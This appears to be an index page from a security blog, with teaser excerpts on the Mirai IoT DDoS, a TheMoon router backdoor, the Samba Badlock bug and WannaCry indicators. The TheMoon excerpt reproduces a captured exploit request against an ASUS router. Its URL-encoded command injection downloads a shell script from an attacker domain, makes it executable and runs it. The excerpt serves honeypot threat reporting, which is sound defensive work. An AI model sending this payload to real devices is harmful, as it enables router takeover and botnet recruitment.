Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT) ? In today’s technological expansion everything seems to be connected to the Internet, for instance in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected … Read more

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.   POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ … Read more

MAJOR Zero Day 0day Exploit in SMB Samba 445 BADLOCK BUG Vulnerability

Critical vulnerability allowing remote exploitation of virtually ALL versions of Samba’s Server Message Block (SMB) protocol which is a version of Common Internet File System (CIFS) which operates by default over port 445 TCP as an application-layer network protocol. SMB is typically used to provide shared access to files, printers, and serial ports and miscellaneous communications … Read more

Wcry WannaCry WCry Ransomware Malware ETERNALBLUE/MS17-010 Worm is dead or is it? – active new IOCs Domain Names/IPs

Ransomware is nothing new, since 2012 it has been wreaking havoc on the world. The TTPs for delivering and infecting victims has changed over the years but the end goal remains the same, give me your money or you’ll never see your files again. Some of the first ransomware campaigns used mechanisms such as exploit … Read more